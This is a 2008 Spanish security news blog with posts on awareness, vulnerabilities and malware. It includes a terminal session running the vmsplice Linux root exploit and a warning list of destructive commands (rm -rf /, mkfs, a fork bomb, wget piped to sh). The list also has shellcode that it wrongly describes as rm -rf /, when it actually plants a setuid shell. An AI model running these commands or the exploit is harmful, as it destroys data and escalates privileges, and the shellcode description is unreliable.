sábado, 29 de noviembre de 2008

Mini-test de seguridad informática (Usuarios Finales)

YA HABLANDO UN POCO DE LA IMPORTACIA DE LA SEGURIDAD EN LOS USUARIOS FINALES UN PEQUEÑO TEST DE EVALUACION:

A partir del 24/noviembre se encuentra disponible en línea una breve encuesta elaborada por el ArCERT, dependiente de la Oficina Nacional de Tecnologías de Información, a través de la cual usted podrá comprobar cuán informado se encuentra respecto al tema de la seguridad informática.

El objetivo de la misma es propiciar una reflexión sobre los riesgos más comunes a los que nos exponemos cuando utilizamos Internet y ayudarlo a conocer cómo evitarlos.

Es por ello que lo invitamos a medir sus conocimientos en la materia, a través de la resolución de un pequeño test de opción “Verdadero” o “Falso”, en torno a una serie de cinco preguntas. En caso de que alguna de sus respuestas no fuere acertada, dispondrá de una breve explicación sobre la alternativa correcta.

La encuesta está disponible en:

http://www.argentina.gov.ar/argentina/portal/encuesta/encuestaseguridad.dhtml

¿Porqué concientizar a los usuarios en la seguridad de su información y privacidad?

Es una pregunta muy interesante, pues muchos de los ataques en un equipo son en gran medida producto del descuido de los usuarios.
Esta información es de gran ayuda para entender la importancia que tiene el concientizar a los usuarios de la protección de su información y con ello de su privacidad.

Un fragmente de este articulo interesante:


"
La informática ha penetrado hacia lugares que uno antes no se habría ni imaginado. Por ello, muchísima información que hace mucho tiempo atrás se mantenía tradicionalmente en papel, hoy se conserva en computadoras. Ejemplo de ello pueden ser: la historia clínica de un paciente en un hospital, la información académica de un alumno, o los datos de una cuenta bancaria, etc.
Si bien la informática en sí ha hecho procesos más eficientes de lo que eran originalmente, también expone esa información, que de alguna manera antes no ocurría. Por ejemplo, si hablamos de la historia clínica de un paciente: años atrás vos a esos datos los tenías en un archivo de papel que estaba dentro de una oficina especial a la que solo se podía ingresar con llave. Entonces, de cierta manera podías argumentar que tenía un cierto nivel de protección.
La cuestión es hoy, que pasa si yo pongo esa información en una computadora y a esa PC la conecto a una red para que se pueda acceder de manera remota. Ahí entra la cuestión de la seguridad. Esto quiere decir que si quiero que ciertas personas tengan un acceso legitimo a esa información, puedan hacerlo. Pero además prevenir que quienes no están autorizados a acceder, no lo hagan. Entonces, este es el juego, que es lo que uno puede implementar para que eso se cumpla y proteger la información sensible”.

¿A que se le considera información sensible?
Información sensible es la información que cada uno de los usuarios considera crítica. Uno piensa que información sensible puede ser lo relacionada con lo militar o gubernamental. Pero a mí me pueden parecer sensibles las comunicaciones que mantengo por correo electrónico. Entonces, quiero hacer uso de esa tecnología, pero a la vez evitar que un tercero acceda a mis mensajes”.

¿A quien le interesa la seguridad informática?
Hay que diferenciar entre lo que es seguridad informática y lo que es seguridad de la información. Cuando hablas de seguridad informática muchas veces te estás refiriendo en particular a la seguridad de la información, pero en lo que tiene que ver con el procesamiento de esa información mediante equipos informáticos.
Entonces, un usuario final necesariamente no está capacitado en el área informática, pero si tiene interés por la seguridad de su información, y necesariamente no le interesa que mecanismos ni que tecnologías están trabajando. Simplemente quiero que no se viole la privacidad de su información. En síntesis, lo que le interesa al usuario final es la seguridad de la información en sí.
Lo mismo sucede con las organizaciones, empresas privadas e instituciones gubernamentales, lo que les debe importar es la seguridad de la información. Después, todas aquellas personas que estamos involucradas con cuestiones técnicas, ahí si estamos trabajando, porque implementamos seguridad informática para lograr seguridad de la información.
Esto no quiere decir que teniendo seguridad informática tengas seguridad de la información, porque por ahí la información es vulnerada donde no intervienen centros de cómputos”.

La ingeniería social como práctica para vulnerar humanos
“La ingeniería social se denomina al proceso mediante el cual logras un objetivo vulnerando la condición humana. Es decir, puedo tener varios mecanismos técnicos para obtener tu clave cuando accedes a tu correo electrónico. Supongamos que desde mi maquina ingreso a la tuya para obtener tus claves. Eso sería acceso a la información de manera técnica.
Otro método que puedo aplicar seria falsificar un mensaje de correo electrónico y enviártelo presumiendo que soy soporte técnico de quien te brinda servicio de correo electrónico a vos, diciéndote que tuvimos graves problema en la base de datos y es necesario que nos reportes tu usuario y contraseña. Entonces eso sería el uso de ingeniería social, donde mediante algo técnico se intenta explotar vulnerabilidades de características humanas”. "

El link donde pueden leer más

http://seguridad-informacion.blogspot.com/2008/11/porqu-concientizar-los-usuarios-en-la.html

Windows 7 !!!

Microsoft ha afirmado que Windows 7 tendrá plena compatibilidad con controladores, programas, etc. que funcionan correctamente con Windows Vista, de modo que no se repitan inconvenientes en cuanto a compatibilidad tal como sucedió al usar programas que funcionaban a la perfección en Windows XP y no en Windows Vista

Para más información cheque las páginas siguientes

http://winfuture.de/screenshots/Windows-7-Meilenstein-3-Build-6.1.6780-3500-1.html
http://winfuture.de/news,43570.html
http://winfuture.de/news,43634.html

Saludos

viernes, 28 de noviembre de 2008

Teoría de Seguridad en Sistemas Operativos

Considero que es altamente controversial la discusión entre al seguridad de los distintos sistemas operativos.

Personalmente considero que el software libre siempre tendrá una gran ventaja sobre los demás, que intentaré explicar aquí.

Para empezar, hay que distinguir un poco entre el software libre y el software gratuito, que aunque en inglés ambos se llamen "free software", la connotación puede significar un mundo de diferencia. Para ello les sugiero consultar la página oficial del proyecto GNU, y su video más reciente.

Esencialmente, para el punto de este artículo, el software libre es aquel donde cada uno tiene derecho a modificarlo y distribuirlo a su antojo.

Muchas veces uno piensa que Linux es sinónimo de software libre, pero no siempre es así.

Por ejemplo tenemos a Ubuntu que usa software "restringido" y que instala software propietario en varios lugares, desde codecs de video hasta controladores de hardware. Incluso Firefox, el famoso explorador de internet ha tenido que ser reemplazado en las distribuciones "puras" de GNU/Linux, como Debian, ya que su logo es comercial y no puede ser distribuido bajo el mismo nombre con modificaciones que no hayan sido hechas por Mozilla, por lo que se creó "IceWeasel", la vertiente libre de Firefox, para que los desarrolladores de Debian modificaran Firefox para cumplir con sus estándares de seguridad y estabilidad.

Sé que suena a burocracia, política y aspectos legales que finalmente son una molestia para un usuario final. Pero estos pequeños detalles deben ser cuidados por los proyectos de software libre para poder cumplir con su meta, que el usuario final pueda hacer con su sistema lo que quiera, que todo el mundo pueda contribuir y distribuir su código.

Pero, ¿qué tiene que ver esto con la seguridad?

Desde mi punto de vista es muy simple, imaginemos el mismo escenario en 2 sistemas operativos distintos, se encuentra una vulnerabilidad en un proceso del núcleo del sistema que permite a un atacante obtener el control del sistema.

El usuario lee a cerca de la vulnerabilidad y piensa en posibles soluciones antes de que salga al público una nueva versión modificada o un parche de seguridad:

Compilar su sistema operativo sin el módulo que activa el proceso vulnerable.
Modificar el código para corregir la vulnerabilidad.

Son soluciones que llevarán algo de tiempo y esfuerzo, pero esto le permitiría protegerse de los ataques que se puedan generar, sin embargo sólo se puede realizar dentro de un sistema operativo de software libre, en cualquier otro tipo de software, ya sea gratuito o comercial, el usuario está restringido a lo que dicta la licencia que adquirió al instalarlo y en la mayoría de los casos ni siquiera tendrá acceso al código, así es que al que no tiene un sistema operativo de software libre, sólo le queda esperar a que se emita algún parche que solucione esto o una nueva versión que lo haya arreglado.

Es decir, el usuario de software libre tendrá siempre la ventaja de que no depende de nadie más para su propia seguridad.

aircrack-ng

El viernes 28, 11:00-13:00hrs. Auditorio Alberto Barajas Celis [TALLER IMPARTIDO EN INGLÉS]

Thomas d'Otreppe | aircrack-ng

Se explicarán las nuevas tendencias en seguridad inalámbrica, con énfasis en los recientes ataques contra WPA. Habrá demostraciones en vivo, con la posibilidad de que los participantes prueben los ataques.

Creador de aircrack-ng, egresado de la Haute Ecole de Bruxelles. Diseñó, junto con Mati Aharoni, Offensive Security WiFu, un curso proactivo de seguridad inalámbrica.


Mas informacion:

http://intromision.fciencias.unam.mx/talleres.html

jueves, 27 de noviembre de 2008

Ernst & Young publica los resultados de la XI Encuesta Global de Seguridad de la Información

La consultora Ernst & Young ha publicado los resultados de la Encuesta Global de Seguridad de la Información (Global Information Security Survey) en su undécima edición, en la que se ofrece una mirada al actual estado de la seguridad de la información y ofrece recomendaciones para la mejora de cara al futuro.
La encuesta se realizó entre junio y agosto de este año, entre 1.400 organizaciones de más de 50 países de todo el mundo. Entre los resultados a destacar cabe mencionar la cada vez mayor preocupación por el impacto que puede tener un incidente de seguridad en la reputación e imagen de marca. Un 85% de los encuestados reseñaron los daños a la reputación y la marca como la consecuencia más importante ante un ataque, frente al 72% que destacó la pérdida de ingresos. Otras consecuencias preocupan aun menos, como las sanciones (68%) o acciones legales (un 65%).
Otro dato a reseñar, es que a pesar de la crisis las empresas parecen conscientes de la importancia de la seguridad de la información y tan solo un 5% de los encuestados dicen que reducirán su presupuesto para esta materia en el año que viene. Incluso, la mitad afirman que aumentarán su gasto en seguridad informática (mientras que un 45% dicen que la mantendrán). Ernst & Young concluye que las organizaciones reconocen que efectuar recortes en materia de seguridad podría tener un efecto contrario, además de que una gran mayoría considera que las amenazas y los ataques aumentarán durante la época de crisis.
Según revela la encuesta el uso de terceras empresas, y externalización de trabajos de seguridad de la información va en aumento, especialmente para la realización de trabajos de auditorías de seguridad (60%) y tests de penetración (59%). Además, se espera que estas dos actividades sufran incrementos significativos, de un 15% y un 18% respectivamente, de compañías que subcontratan este tipo de servicios.
El estudio se compone de diez puntos o aspectos sobre los que desglosa la información:* La protección de la reputación y la marca se ha convertido en un importante motor para la seguridad de la información.* A pesar de las presiones económicas, las organizaciones siguen invirtiendo en seguridad de la información.* Los estándares internacionales de seguridad de la información están adquiriendo una mayor aceptación y aprobación* Muchas organizaciones siguen luchando para lograr una visión estratégica de la seguridad de la información.* Ahora la privacidad es una prioridad, pero las acciones se quedan cortas.* Las personas siguen siendo el eslabón más débil en la seguridad de la información.* Los riesgos del crecimiento de subcontratas no se están corrigiendo.* La continuidad del negocio sigue dependiendo de tecnología de la información.* La mayoría de las organizaciones no están dispuestas a externalizar actividades claves de seguridad de la información.* Pocas empresas cubren los riesgos de seguridad de la información con seguros.

El informe puede descargarse desde:http://www.ey.com/Global/assets.nsf/International/TSRS_Global_Information_Security_Survey_2008/$file/TSRS_Global_Information_Security_Survey_2008.pdf

Revelación de información a través de ICMP en Check Point VPN-1

Se ha descubierto una vulnerabilidad en Check Point VPN-1 que podría permitir a un atacante remoto obtener las direcciones IP de la red interna.

El fallo reside en un manejo incorrecto de paquetes con un valor TTL bajo. Al recibir paquetes en puertos del cortafuegos que son mapeados a puertos internos, dichos paquetes son reescritos para enviarlos al servidor de administración del firewall. Con un TTL corto este proceso falla y sea crea un paquete ICMP de respuesta que contiene la dirección interna del cortafuegos. Un atacante remoto podría obtener las direcciones IP internas a través de paquetes especialmente manipulados.

Existe una prueba de concepto que explota esta vulnerabilidad. Check Point ha confirmado que en breve publicará una actualización para corregir este problema.

Falso positivo de AVG bloquea una dll legítima de Windows

La gente de AVG se enfrenta a un problema: hace algunos días, la base de firmas de este popular antivirus se actualizó con información, indicando que el archivo user32.dll, necesaria para la ejecución de Windows, era un virus peligroso, por lo que ofrecía los servicios para la eliminación del mismo.
La verdad era otra: se trataba de un falso positivo -un virus supuesto, pero que nunca lo ha sido, y por un error del antivirus, éste se detecta como virus- y que produjo muchos problemas a los usuarios de Windows luego de que se les indicara que este archivo contenía un peligroso virus.
El supuesto virus detectado, se trata de un Malware PSW.banker4.APSA y por ende, ofrece diferentes soluciones para la desinfección. Dicho archivo, supuestamente infectado, contiene importantes elementos gráficos para la carga de la parte visual del sistema operativo, GUI.
El problema del falso positivo afectó a muchos usuarios de Windows XP SP2 y SP3, y presentaban una vez detectado el falso positivo, problemas para reiniciar o cargar Windows, por la librería faltante.

martes, 25 de noviembre de 2008

Informe de Symantec Revela del Auge de la Economía Clandestina

CUPERTINO, California. - 24 de noviembre de 2008. Symantec Corp. anunció hoy su informe sobre la economía clandestina. El informe describe detalladamente que la economía clandestina en Internet ha madurado para convertirse en un mercado global y eficaz en donde los bienes robados y los servicios relacionados con el fraude se venden y compran de manera común, y donde se mide en millones de dólares el valor estimado de los bienes ofrecidos por los vendedores individuales. El informe se deriva de los datos recolectados de servidores clandestinos por la organización Security Technology and Response (STAR) de Symantec, entre el 1 de julio de 2007 y el 30 de junio de 2008.

El valor potencial del total de bienes anunciados observado por Symantec fue superior a $276 millones de dólares en el periodo reportado. Este valor se determinó usando los precios anunciados de los bienes y servicios y midiendo la suma de dinero que obtendrían los anunciantes si liquidaran su inventario.

La información de las tarjetas de crédito es la categoría de bienes y servicios con más anuncios en la economía clandestina, con 31 por ciento del total. Aunque los números de las tarjetas de crédito se vendían entre $0.10 y $25 dólares por tarjeta, el límite de crédito promedio de tarjetas robadas anunciadas, según lo observado por Symantec, fue superior a los $4,000 dólares. Symantec calcula que el valor potencial de las tarjetas de crédito anunciadas durante el periodo del reporte alcanza aproximadamente $5,300 millones de dólares.

La popularidad de la información de las tarjetas de crédito se debe probablemente a las diversas formas en que se puede obtener esta información para ser utilizada con fines fraudulentos; las tarjetas de crédito son fáciles de usar para realizar compras en Internet y generalmente es difícil que los comerciantes o los proveedores de crédito identifiquen las transacciones fraudulentas antes de que los estafadores las concreten y reciban sus bienes. Además, la información de las tarjetas de crédito se vende generalmente a los estafadores por volumen, con descuento o se obsequia al realizar grandes compras.

La segunda categoría más común de bienes y servicios anunciados fueron las cuentas bancarias con un 20 por ciento del total. La información de cuentas bancarias robadas se vende entre $10 y $1,000 dólares americanos, mientras que el saldo promedio de las cuentas bancarias robadas está cerca de los $40,000 dólares.

Haciendo un cálculo que considera el saldo promedio anunciado de una cuenta bancaria junto con el precio promedio de las cuentas robadas, el valor total de las cuentas bancarias anunciadas entre el 1 de julio de 2007 y el 30 de junio de 2008 correspondió a $ 1,700 millones de dólares. La popularidad de la información de las cuentas bancarias se debe probablemente a su potencial para realizar pagos y a la velocidad con que éstos se realizan. Hubo un caso en que se transfirió dinero de las cuentas bancarias hacia lugares no rastreables en menos de 15 minutos usando sistemas en línea.

Durante el periodo del informe, Symantec observó 69,130 anunciantes activos y un total de 44,321,095 mensajes colocados en foros clandestinos. El valor potencial del total de bienes anunciados por los 10 principales anunciantes fue $16.3 millones de dólares en tarjetas de crédito y $2 millones de dólares en lo referente a cuentas bancarias. Además, el valor potencial de los bienes anunciados por el anunciante más activo identificado por Symantec durante el periodo del estudio fue de $6.4 millones de dólares.

La economía clandestina es geográficamente diversa y genera ingresos a los ciberdelincuentes que van desde grupos indefinidos de personas hasta grupos organizados y sofisticados. Durante este periodo, América del Norte tuvo el mayor número de estos servidores, con 45 por ciento del total; la región de Europa, Medio Oriente y África albergó el 38 por ciento; seguidas de Asia-Pacífico con 12 por ciento y América Latina con un 5 por ciento. Cabe mencionar que las ubicaciones geográficas de los servidores clandestinos cambian constantemente para evadir su localización y detección.

Como lo señala el Informe de Symantec sobre la Economía Clandestina, los cibercriminales están aprovechándose de la información que recolectan de manera ilegal de los consumidores y las empresas. Dado que estos individuos y grupos continúan diseñando nuevas herramientas y técnicas para defraudar a los usuarios legítimos alrededor del mundo, la protección contra estos ataques debe convertirse en prioridad internacional”, dijo Stephen Trilling, vicepresidente de Symantec Security Technology and Response.

Para conocer detalles adicionales acerca del Informe de Symantec sobre la Economía Clandestina, pueden dirigirse a: http://www.symantec.com/es/mx/about/news/release/article.jsp?prid=20081124_01

Fuente: www.cnnexpansion.com/blogs/

Descubren vulnerabilidad en el kernel de Windows Vista

La compañía austriaca de seguridad Phion reveló una vulnerabilidad en el núcleo de Vista que puede producir un desbordamiento de buffer colgando el sistema, o que puede ser explotado para inyectar código malicioso y comprometer la seguridad del equipo cliente.

La vulnerabilidad se encuentra en el sistema de red cuando se envían solicitudes a la API “iphlpapi.dll”. El error está comprobado en Vista Ultimate y Enterprise y según los investigadores “es muy probable que afecte al resto de versiones de 32 y 64 bits”. Windows Xp no está afectado, según explican.

El exploit puede ser usado para apagar la computadora o provocar la pérdida de conectividad de la Red usando ataques de denegación de servicio (DoS). Aunque se necesitan permisos de administrador para aprovechar la vulnerabilidad, la misma podría ser explotada mediante envío de paquetes DHCP sin permisos de administración, según explican desde el grupo de seguridad austriaco, que informó que llevaban trabajando desde el mes pasado con responsables del “Microsoft Security Response Center” para “ubicar, clasificar y corregir la vulnerabilidad”.

Una solución que en principio no llegará hasta la publicación del segundo paquete de servicio de Windows Vista, aunque no se conoce que la vulnerabilidad haya sido explotada.

videos sobre seguridad informática

HOLA A TODOS, ESPERO SE ENCUENTREN BIEN.
NAVEGANDO POR LA RED COMO TODOS LOS DIAS, ENCONTRE UNA PAGINA MUY INTERESANTE REFERENTE A LA SEGURIDAD INFORMÁTICA NO SE SI ALGUIEN LA CONOSCA,EL SITIO ES www.dragonjar.org. EN ESPECIAL ENCONTRE UNA PÁGINA EN DONDE HAY UNA GRAN VARIEDAD DE VIDEOS DE SEGURIDAD MUY INTERESANTES Y QUE NOS PUEDEN SERVIR A TODOS NOSOTROS, LES DEJO EL LINK EXACTO.

http://www.dragonjar.org/videos-y-video-tutoriales-relacionados-con-la-seguridad-informatica.xhtml.

NOS VEMOS.
CUIDENSE

Ingenieria INVERSA

Para saber un poco mas relacionado con la ingeniería inversa y el papel de esta ante problemáticas como la piratería.
Considerado algunas veces como un mal necesario.


"La ingeniería inversa es una metodología para analizar el diseño de un dispositivo o sistema. El objetivo del estudio varia ya que como toda metodología o herramienta en el área de seguridad es un arma de dos filos. Por un lado se puede utilizar para conocer como funciona un sistema y darle la vuelta a los sistemas de protección contra copias no autorizadas. Por otro lado es una buena herramienta para entender el funcionamiento de los nuevos virus, poder erradicarlos y/o diseñar una vacuna."

Dejo la liga del articulo completo :

http://blog.segu-info.com.ar/2008/11/ingenieria-inversa.html

lunes, 24 de noviembre de 2008

Local Root Exploit

Local Root Exploit es un exploit que afecta al Kernel Linux versión 2.6 de Ubuntu y Debian, el exploit es necesario ejecutarlo como usuario local, para así obtener identidad de root.

Los Kernel Linux afectados son desde la versión 2.6.17 hasta 2.6.24. Por el momento para solucionar el problema de seguridad, habría que compilar el kernel eliminando vmsplice.

$ gcc exploit.c -o exploit
$ whoami
usuario
$ ./exploit
-------

----------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d90000 .. 0xb7dc2000
[+] root
$ whoami
root

Exploit: http://www.milw0rm.com/exploits/5092

Keylogger inalámbrico

Es relativamente frecuente la posibilidad de que las señales que emiten los teclados inalámbricos puedan ser interceptadas por una persona con suficientes conocimientos como para descifrar la señal y poder leer cada tecla pulsada de un teclado.

Pero, ¿y si el teclado tiene cable?¿estamos seguros? Un estudio de un grupo Suizo ha demostrado que no.

El grupo LASEC de seguridad y criptografía de Lausana (Suiza), ha conseguido desarrollar 4 métodos diferentes para capturar las interferencias electromagnéticas que producen los teclados con cable y recuperar el texto escrito en ellos.

Han realizado pruebas con 11 diferentes teclados compradors entre 2001 y 2008, tanto USB como PS/2 así como integrados en portátiles, y todos y cada uno de ellos ha sido vulnerable como mínimo a uno de sus 4 ataques. El alcance físico de los ataques es de hasta 20 metros y puede haber paredes de por medio.

http://foro.hackhispano.com/showthread.php?s=3c845b6603b2344451d20c9a831a0e66&p=162240#post162240

Sigue Mac ?

Esta semana han aparecido dos amenazas para el sistema operativo de Apple, un troyano con la habilidad de descargar e instalar programas maliciosos a la elección del atacante. Además de ello una aplicación hacker para crear puertas traseras.

El troyando en cuestión es ‘OSX.RSPlug.D’ según Intego, el especialista de seguridad que descubrió la amenaza. Afirma que es una variante de un viejo programa malicioso con un nuevo instalador. “Es un downloader, y contacta con un servidor remoto para descargar los archivos e instalarlos [...] Esto significa que, en el futuro, el downloader podría ser capaz de instalar otro tipo de programas aparte del que actualmente instala“. En el resto de características el troyano es similar a las previas versiones de RSPlug, que empezó su andadura en octubre de 2007, instala un programa DNSChanger, que redirige el tráfico de Internet del usuario a través de un DNS malicioso llevando a los usuarios finales a sitios de phising o a páginas de anuncios.

Intego afirma que el troyano OSX.RSPlug.D ha llegado esta semana junto con otra amenaza distinta, OSX.TrojanKit.Malez según Intego y según Symantec y Trend Micro, OSX.Lamzev. En esta ocasión se trata de una aplicación hacker diseñada para crear e instalar puertas traseras. Sin embargo la compañía afirma que no es una amenaza seria dado que el potencial de la misma se basa en el acceso físico al sistema a infectar.

Empresas de seguridad ya llevan anunciando desde hace tiempo que la plataforma Mac no es tan segura como los usuarios creen, de momento Apple no ha respondido a dicha afirmación.

Fuente: http://www.theinquirer.es/2008/11/23/mac-os-x-bajo-ataque-van-dos-esta-semana.html

domingo, 23 de noviembre de 2008

Los 7 comandos comandos más peligrosos de GNU/LINUX

Creo que muchos sabemos del famoso comando rm -rf / que puede destruir todo lo que tengamos en nuestro GNU/Linux, pero tambien existen otros comandos que tambien son peligrosos y que no tenemos que ejecutarlos nunca, aqui una pequeña traduccion:

1. Codigo:

rm -rf /
Como les dije, este poderoso comando borra todos los archivos de nuestro directorio raiz “/”.

2. Codigo:

char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Esta es la versión hexadecimal de [rm-rf /] que pueden engañar incluso los no experimentados usuarios de GNU/Linux.

3. Codigo:

mkfs.ext3 /dev/sda

Esto reformatea todos los archivos del dispositivo que se menciona después de que el comando mkfs.

4. Codigo:

:(){:|:&};:

Conocida como bomba fork, este comando ejecutar un gran número de procesos hasta que el sistema se congela. Esto puede conducir a la corrupción de datos.

5. Codigo:

any_command > /dev/sda

Este comando provoca perdida total de datos, en la particion que se menciona en el comando

6. Codigo:

wgethttp://some_untrusted_source -O- | sh

Nunca descargar fuentes no confiables y que a continuacion se ejecuten, pueden ser codigos maliciosos

7. Codigo:

mv/home/yourhomedirectory/* /dev/null

Este comando es para mover todos los archivos de tu directorio home a un lugar que no existe, nunca veras tus archivos de nuevo

Las 6 razones por las que Windows pierde

Revisando el blog Linux los Angeles, me llamó la atención este título, dejo la nota tal cual, haber qué les parece...

Razón 6: El orgullo
Microsoft siempre ha sido vista como la bestia corporativa que es. Siempre es más fácil degradar para aquéllos que están arriba que para los que están comenzando. Microsoft está en una posición de dominación corporativa y personal. Con un control total del entorno Windows y la plataforma Microsoft Office, pueden determinar cuando los usuarios deben actualizarse. La gente, en general, prefiere elegir y actualmente no hay competidor, en cuanto aceptación, de Microsoft Office. Open Office es un competidor pero no ha sido tomado tan en serio cono Microsoft Office. Es fácil centrarse en aquellos que están acostumbrados a usar la opción mayoritaria, pero es mucho más difícil hacer cambiar a la minoría que no elige tu opción.

Razón 5: Malware
Es una idea simple, Microsoft tiene la mayor base de usuarios y compañías de software desarrollando. Si un hacker o cracker decide atacar a un grupo, tiene mucho más sentido centrarse en la plataforma que más gente potencial tiene como víctima. Microsoft lo sabe y está trabajando en ello pero a día de hoy es imposible hacer frente a todas las amenazas y a todos los frentes

Razón 4: Google
Google ha crecido mucho como empresa y actualmente está comenzando a hacer frente al gigante de Redmond en varios puntos. Muchos de sus productos disfrutan de la mentalidad libre de la compañía así como de la etiqueta enorme de gratuita. Las aplicaciones que ha puesto en el mercado pese a ser la mayoría beta, son de alta calidad, no hace falta mencionar GMail, el buscador Google, Chrome que está comenzando a despegar, etcétera.
Google ha dominado el terreno online y ahora está acercándose a Microsoft en aspectos más tradicionales como son el navegador web, Google Chrome, y el terreno de terminales móviles, con Android, ambos gratuitos, que frente a Windows Mobile, que tiene coste de licencia para los fabricantes, está dando y dará mucho que hablar.

Razón 3: Código abierto
La comunidad de código abierto sigue creciendo. Desde sistemas operativos como Ubuntu, pasando por el navegador Firefox, la comunidad está lanzando proyectos cada día más válidos, y gratuitos ante opciones de Microsoft.

Razón 2: Vista
Aparte del estado en el que Vista está hoy día, se lanzó en un estado realmente verde. Además de ello se ha demostrado y Microsoft ha admitido, alterar los requisitos mínimos del sistema operativo en beneficio de Intel, lo que sin duda ha alterado la experiencia de usuario en muchas máquinas que estaban por debajo de lo que se puede admitir como aceptable. Ese es uno de los motivos por los que la gente ha decidido volver a XP o buscar alternativas con otros sistemas operativos Linux. A día de hoy, Vista ha madurado bastante y si éste hubiera sido su estado inicial otro gallo cantaría, pero, la gente ya ha decidido y Vista no es aceptable.

Razón 1: Apple
Apple ha dado un gran salto en cuota de mercado gracias al fiasco de Vista. Apple ha visto la posibilidad y no ha dudado en atacar a Microsoft. Como ejemplo de ello, tenemos los anuncios de Apple VS PC que se han convertido en el spot número 1. Ninguna compañía se gasta tanto dinero como los de Cupertino para reducir la presencia de Microsoft en los ordenadores personales de consumo. Apple se muestra como la mejor opción, en términos de sistema operativo, disponible para los consumidores que quieran una experiencia libre de problemas, siempre dentro de lo posible, claro está. Apple se ha centrado en desarrollar sus equipos que funcionan sin más, y tanto los dispositivos, periféricos y software quedan perfectamente integrados.

Segu-Info en diario Perfil (x2)

Segu-Info en diario Perfil (x2)

Este domingo Segu-Info a aparecido en dos notas en el diario argentino Perfil. El primer artículo Argentina, vivero de hackers que hacen temblar a Internet hace un recorrido por los diversos personajes del under y profesionales de seguridad argentinos.

En la segunda se trata el tema actual de las redes sociales y su repercusión y se hace referencia al estudio de Segu-Info sobre Desconocidos en las Redes sociales.

La policía busca cómo entrar en los ordenadores del etarra 'Txeroki'

La policía busca cómo entrar en los ordenadores del etarra 'Txeroki'

La información contenida en los dos ordenadores portátiles incautados al jefe militar de ETA, Mikel Garikoitz Azpiazu 'Txeroki', resultará muy difícil que pueda ser descifrada a menos que el etarra facilite la contraseña o que los investigadores, en un golpe de suerte, acierten la clave de acceso.

Así lo han asegurado fuentes de la lucha antiterrorista, que han confirmado que los dos equipos informáticos se encuentran protegidos con el ya conocido programa PGP, utilizado desde hace años por los miembros de la banda terrorista para codificar sus archivos y obstaculizar el trabajo de investigación de la policía.

El PGP, del inglés 'Pretty Good Privacy' o 'Privacidad bastante buena', es un programa gratuito de libre acceso que se descarga en Internet en unos pocos minutos, pero que proporciona un blindaje prácticamente impenetrable a la acción de los curiosos.

Algunos expertos han remarcado además que, a pesar de las leyendas que circulan, los servicios de inteligencia no disponen de una llamada "puerta trasera", esto es, un agujero en la seguridad del programa que permita acceder a su contenido.

Prohiben la venta del keylogger CyberSpy

Prohiben la venta del keylogger CyberSpy

Un Tribunal de Distrito de EE.UU. ha detenido temporalmente la venta de software espía y keylogger RemoteSpy a petición de la Comisión Federal de Comercio, que reclama el software viola la Ley FTC (Federal Trade Commission).

La FTC presentó una denuncia (PDF) en contra la empresa de Florida CyberSpy, alegando que ha violado la Ley FTC a través de la venta de software que puede ser controlado remotamente por alguien que no sea el propietario o usuario autorizado del ordenador. Además su software puede ser instalado sin el conocimiento del propietario, y puede utilizarse para recabar información subrepticiamente, revelando información personal. La FTC también alega que CyberSpy recoger y almacena información personal, recopilada con RemoteSpy.

El tribunal, en su orden de restricción temporal presentada el 6 de noviembre contra CyberSpy, dijo que hay posibilidad de que la FTC pueda probar que el software espía ha violado la Ley.


Fuente: http://news.cnet.com/8301-13578_3-10099123-38.html

Una vulnerabilidad de Gmail permitiría a atacantes reenviar correos

Una vulnerabilidad de Gmail permitiría a atacantes reenviar correos

Una vulnerabilidad de seguridad de Gmail podría permitirle a un atacante fijar filtros en las cuentas de correo de los usuarios sin que lo sepan, segun una prueba de concepto publicada el domingo en GeekCondition.com.

En su publicación, Brandon describe que la vulnerabilidad ha provocado que alguna gente pierda sus nombres de dominios registrados mediante GoDaddy.com.

Sin publicar el exploit por completo, aquí está la clave cuando Brandon explica que este se basa en obtener las variables que representan el nombre de usuario y el "at":

Cuando uno crea un filtro en su cuenta de Gmail, se envía un requerimiento a los servidores de Google para que sea procesado. El requerimiento se realiza con la forma de una URL con varias variables. Por razones de seguridad, su navegador no muestra todas las variables que hay en la URL. Usando Firefox y un agregado que se llama Live HTTP Headers (encabezados HTTP en vivo), uno puede ver exactamente que variables son enviadas desde su navegador hacia los servidores de Google.

Después de eso, un atacante sólo necesita identificar la variable que es el equivalente de el nombre de usuario.

"Obtener esta variable es difícil pero posible," dice. "No voy a decir como lograrlo, si uno busca suficiente en Internet logrará averiguarlo."

La variable "at" puede ser obtenida visitando sitios Web maliciosos, escribe Brandon, quien sugiere que Google haga que la variable "at" expire después de cada requerimiento en lugar de después de cada sesión [como es ahora].

Para evitar ser una víctima de la vulnerabilidad, los usuarios debe verificar a menudo sus filtros, sugiere Brandon. Los usuarios de Firefox pueden descargar una extensión llamada NoScript que ayuda a prevenir estos ataques, dice.

Por supuesto, cualquier sitio Web que use cookies para pedidos de autenticación puede ser aprovechada de la misma forma. Para evitar convertirse en una víctima de este tipo de exploit, los usuarios de Gmail deben cerrar su sesión cuando no la usan, y por supuesto no visitar sitios Web en los que no confíen.

Google no respondió a los pedidos sobre comentarios al respecto.

Fuente: news.cnet.com
http://geekcondition.com/2008/11/23/gmail-security-flaw-proof-of-concept/

Una vulnerabilidad de Gmail permitiría a atacantes reenviar correos

Una vulnerabilidad de seguridad de Gmail podría permitirle a un atacante fijar filtros en las cuentas de correo de los usuarios sin que lo sepan, segun una prueba de concepto publicada el domingo en GeekCondition.com.

En su publicación, se describe que la vulnerabilidad ha provocado que gente pierda sus nombres de dominios registrados mediante GoDaddy.com.

